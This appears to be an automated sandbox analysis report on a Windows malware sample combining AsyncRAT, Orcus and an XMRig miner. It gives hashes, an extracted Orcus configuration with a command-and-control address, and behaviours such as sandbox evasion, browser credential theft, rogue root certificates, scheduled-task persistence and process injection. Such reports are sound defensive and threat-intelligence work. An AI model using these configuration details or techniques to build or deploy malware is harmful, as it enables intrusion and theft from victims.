asyncrat | f95e19a66cb1e3a612f2c07380376196e856dfefbe1038c4e6fd7d6a03388b5d

Analysis

max time kernel
141s
max time network
188s
platform
windows7_x64
resource
win7v20210410
submitted
17-07-2021 07:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a71f91351dc1bb57f0426080f2c03854.exe
Size

8.4MB
MD5

a71f91351dc1bb57f0426080f2c03854
SHA1

a336bd9298b0772f4d5764f695335fc7ef99755b
SHA256

f95e19a66cb1e3a612f2c07380376196e856dfefbe1038c4e6fd7d6a03388b5d
SHA512

dff5db2f6b3af11d10cb25c6e9df6df5bd4668ff54ba4ff1b6456ee7ab338e59297bad4d8722e7da15d175eabcd5833a632e5d62970d04993c733c379b7f4d19

Score

10^/10

asyncrat orcus xmrig newvprefinal discovery evasion miner pyinstaller rat spyware stealer

Malware Config

Extracted

Family

orcus

Botnet

NewVPREFinal

67.242.2.35:10134

Mutex

8185e643b7514e15b8dcfc7df7a8733b

Attributes

autostart_method
TaskScheduler
enable_keylogger
true
install_path
%systemroot%\lsddsds\lsdds.exe
reconnect_delay
10000
registry_keyname
lsd
taskscheduler_taskname
lsdds
watchdog_path
Temp\olsdd.exe

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus

Orcus Main Payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe	family_orcus
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe	family_orcus
\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe	family_orcus

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Looks for VirtualBox Guest Additions in registry 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Orcurs Rat Executable 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe	orcus
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe	orcus
\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe	orcus

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1504-302-0x00000001402EB66C-mapping.dmp	xmrig

Executes dropped EXE 20 IoCs

Processes:

python.exedcbl.exeex.exeec.exefrefef.exeVu.exepython.exeObus.exedefendernottray.exetrayfontdefender.exesihost64.exesihost32.exeWindowsInput.exeWindowsInput.exelsdds.exelsdds.exeolsdd.exeolsdd.exeasasasas.exedefendernottray.exe

pid	process
1748	python.exe
1196	dcbl.exe
1328	ex.exe
1340	ec.exe
1492	frefef.exe
1512	Vu.exe
1740	python.exe
820	Obus.exe
2956	defendernottray.exe
2996	trayfontdefender.exe
2948	sihost64.exe
2180	sihost32.exe
1572	WindowsInput.exe
1140	WindowsInput.exe
2416	lsdds.exe
2692	lsdds.exe
2280	olsdd.exe
1888	olsdd.exe
1520	asasasas.exe
2376	defendernottray.exe

Looks for VMWare Tools registry key 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

frefef.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion frefef.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	frefef.exe

Loads dropped DLL 16 IoCs

Processes:

a71f91351dc1bb57f0426080f2c03854.exepython.exepython.exeex.exeec.exedefendernottray.exetrayfontdefender.exeolsdd.execmd.exesihost64.exe

pid	process
1304	a71f91351dc1bb57f0426080f2c03854.exe
1304	a71f91351dc1bb57f0426080f2c03854.exe
1304	a71f91351dc1bb57f0426080f2c03854.exe
1304	a71f91351dc1bb57f0426080f2c03854.exe
1304	a71f91351dc1bb57f0426080f2c03854.exe
1304	a71f91351dc1bb57f0426080f2c03854.exe
1748	python.exe
1304	a71f91351dc1bb57f0426080f2c03854.exe
1740	python.exe
1328	ex.exe
1340	ec.exe
2956	defendernottray.exe
2996	trayfontdefender.exe
2280	olsdd.exe
2068	cmd.exe
2948	sihost64.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

9 ip-api.com

flow	ioc
9	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

frefef.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	frefef.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	frefef.exe

Drops file in System32 directory 22 IoCs

Processes:

defendernottray.exetrayfontdefender.exeObus.exesihost64.exeec.exeex.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWindowsInput.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File created	\??\c:\windows\system32\microsoft\libs\sihost64.exe	defendernottray.exe
File created	\??\c:\windows\system32\microsoft\telemetry\sihost32.exe	trayfontdefender.exe
File created	C:\Windows\SysWOW64\WindowsInput.exe.config	Obus.exe
File opened for modification	\??\c:\windows\system32\defendernottray.exe	sihost64.exe
File opened for modification	\??\c:\windows\system32\trayfontdefender.exe	ec.exe
File opened for modification	\??\c:\windows\system32\defendernottray.exe	ex.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	\??\c:\windows\system32\microsoft\telemetry\sihost32.log	trayfontdefender.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	\??\c:\windows\system32\trayfontdefender.exe	ec.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	\??\c:\windows\system32\microsoft\libs\sihost64.log	defendernottray.exe
File created	C:\Windows\SysWOW64\WindowsInput.exe	Obus.exe
File created	C:\Windows\SysWOW64\WindowsInput.InstallState	WindowsInput.exe
File created	\??\c:\windows\system32\defendernottray.exe	ex.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	\??\c:\windows\system32\microsoft\libs\WR64.sys	defendernottray.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

defendernottray.exe

description pid process target process

PID 2956 set thread context of 1504 2956 defendernottray.exe explorer.exe

description	pid	process	target process
PID 2956 set thread context of 1504	2956	defendernottray.exe	explorer.exe

Drops file in Windows directory 3 IoCs

Processes:

Obus.exe

description	ioc	process
File created	C:\Windows\lsddsds\lsdds.exe	Obus.exe
File opened for modification	C:\Windows\lsddsds\lsdds.exe	Obus.exe
File created	C:\Windows\lsddsds\lsdds.exe.config	Obus.exe

Detects Pyinstaller 5 IoCs

pyinstaller

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\python\python.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\python\python.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\python\python.exe	pyinstaller
\Users\Admin\AppData\Local\Temp\python\python.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\python\python.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1620 1492 WerFault.exe frefef.exe
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

frefef.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S frefef.exe

pid	pid_target	process	target process
1620	1492	WerFault.exe	frefef.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S	frefef.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

frefef.exeVu.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	frefef.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Vu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Vu.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	frefef.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2416 schtasks.exe
2828 schtasks.exe
2884 schtasks.exe
2912 schtasks.exe
2916 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2448 timeout.exe

pid	process
2416	schtasks.exe
2828	schtasks.exe
2884	schtasks.exe
2912	schtasks.exe
2916	schtasks.exe

pid	process
2448	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

frefef.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation	frefef.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	frefef.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName	frefef.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0	frefef.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

defendernottray.exefrefef.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	defendernottray.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	frefef.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	frefef.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	defendernottray.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	defendernottray.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	defendernottray.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2244 PING.EXE

pid	process
2244	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeVu.exepowershell.exepowershell.exeec.exeex.exepowershell.exepowershell.exepowershell.exepowershell.exeWerFault.exepowershell.exepowershell.exedefendernottray.exetrayfontdefender.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeolsdd.exelsdds.exedcbl.exe

pid	process
796	powershell.exe
1880	powershell.exe
796	powershell.exe
1880	powershell.exe
1512	Vu.exe
1512	Vu.exe
1512	Vu.exe
2536	powershell.exe
2636	powershell.exe
2536	powershell.exe
2636	powershell.exe
1340	ec.exe
1328	ex.exe
2216	powershell.exe
1824	powershell.exe
2216	powershell.exe
1824	powershell.exe
1136	powershell.exe
2172	powershell.exe
1136	powershell.exe
1620	WerFault.exe
1620	WerFault.exe
1620	WerFault.exe
1620	WerFault.exe
1620	WerFault.exe
1620	WerFault.exe
1620	WerFault.exe
2172	powershell.exe
2840	powershell.exe
2856	powershell.exe
2840	powershell.exe
2956	defendernottray.exe
2856	powershell.exe
2996	trayfontdefender.exe
2068	cmd.exe
2068	cmd.exe
2240	powershell.exe
2240	powershell.exe
2316	powershell.exe
2604	powershell.exe
2316	powershell.exe
2604	powershell.exe
2800	powershell.exe
2624	powershell.exe
2800	powershell.exe
2624	powershell.exe
1888	olsdd.exe
1888	olsdd.exe
2416	lsdds.exe
2416	lsdds.exe
2416	lsdds.exe
1888	olsdd.exe
2416	lsdds.exe
1888	olsdd.exe
2416	lsdds.exe
1888	olsdd.exe
1196	dcbl.exe
2416	lsdds.exe
1888	olsdd.exe
2416	lsdds.exe
1888	olsdd.exe
2416	lsdds.exe
1888	olsdd.exe
2416	lsdds.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

Vu.exefrefef.exepowershell.exepowershell.exepowershell.exepowershell.exeec.exeex.exepowershell.exepowershell.exepowershell.exepowershell.exeWerFault.exepowershell.exepowershell.exedefendernottray.exetrayfontdefender.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeexplorer.exelsdds.exeolsdd.exeolsdd.exedcbl.exeasasasas.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1512	Vu.exe
Token: SeDebugPrivilege	1492	frefef.exe
Token: SeDebugPrivilege	796	powershell.exe
Token: SeDebugPrivilege	1880	powershell.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	1340	ec.exe
Token: SeDebugPrivilege	1328	ex.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	1824	powershell.exe
Token: SeDebugPrivilege	1136	powershell.exe
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	1620	WerFault.exe
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	2956	defendernottray.exe
Token: SeDebugPrivilege	2996	trayfontdefender.exe
Token: SeDebugPrivilege	2068	cmd.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeLockMemoryPrivilege	1504	explorer.exe
Token: SeLockMemoryPrivilege	1504	explorer.exe
Token: SeDebugPrivilege	2416	lsdds.exe
Token: SeDebugPrivilege	2280	olsdd.exe
Token: SeDebugPrivilege	1888	olsdd.exe
Token: SeDebugPrivilege	1196	dcbl.exe
Token: SeDebugPrivilege	1520	asasasas.exe
Token: SeDebugPrivilege	1520	asasasas.exe
Token: SeDebugPrivilege	2304	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

lsdds.exe

pid process

2416 lsdds.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

lsdds.exe

pid process

2416 lsdds.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

lsdds.exe

pid process

2416 lsdds.exe

pid	process
2416	lsdds.exe

pid	process
2416	lsdds.exe

pid	process
2416	lsdds.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a71f91351dc1bb57f0426080f2c03854.exepython.exeex.exeec.execmd.execmd.exeVu.exepowershell.execmd.exe

description	pid	process	target process
PID 1304 wrote to memory of 1748	1304	a71f91351dc1bb57f0426080f2c03854.exe	python.exe
PID 1304 wrote to memory of 1748	1304	a71f91351dc1bb57f0426080f2c03854.exe	python.exe
PID 1304 wrote to memory of 1748	1304	a71f91351dc1bb57f0426080f2c03854.exe	python.exe
PID 1304 wrote to memory of 1748	1304	a71f91351dc1bb57f0426080f2c03854.exe	python.exe
PID 1304 wrote to memory of 1196	1304	a71f91351dc1bb57f0426080f2c03854.exe	dcbl.exe
PID 1304 wrote to memory of 1196	1304	a71f91351dc1bb57f0426080f2c03854.exe	dcbl.exe
PID 1304 wrote to memory of 1196	1304	a71f91351dc1bb57f0426080f2c03854.exe	dcbl.exe
PID 1304 wrote to memory of 1196	1304	a71f91351dc1bb57f0426080f2c03854.exe	dcbl.exe
PID 1304 wrote to memory of 1328	1304	a71f91351dc1bb57f0426080f2c03854.exe	ex.exe
PID 1304 wrote to memory of 1328	1304	a71f91351dc1bb57f0426080f2c03854.exe	ex.exe
PID 1304 wrote to memory of 1328	1304	a71f91351dc1bb57f0426080f2c03854.exe	ex.exe
PID 1304 wrote to memory of 1328	1304	a71f91351dc1bb57f0426080f2c03854.exe	ex.exe
PID 1304 wrote to memory of 1340	1304	a71f91351dc1bb57f0426080f2c03854.exe	ec.exe
PID 1304 wrote to memory of 1340	1304	a71f91351dc1bb57f0426080f2c03854.exe	ec.exe
PID 1304 wrote to memory of 1340	1304	a71f91351dc1bb57f0426080f2c03854.exe	ec.exe
PID 1304 wrote to memory of 1340	1304	a71f91351dc1bb57f0426080f2c03854.exe	ec.exe
PID 1304 wrote to memory of 1492	1304	a71f91351dc1bb57f0426080f2c03854.exe	frefef.exe
PID 1304 wrote to memory of 1492	1304	a71f91351dc1bb57f0426080f2c03854.exe	frefef.exe
PID 1304 wrote to memory of 1492	1304	a71f91351dc1bb57f0426080f2c03854.exe	frefef.exe
PID 1304 wrote to memory of 1492	1304	a71f91351dc1bb57f0426080f2c03854.exe	frefef.exe
PID 1304 wrote to memory of 1512	1304	a71f91351dc1bb57f0426080f2c03854.exe	Vu.exe
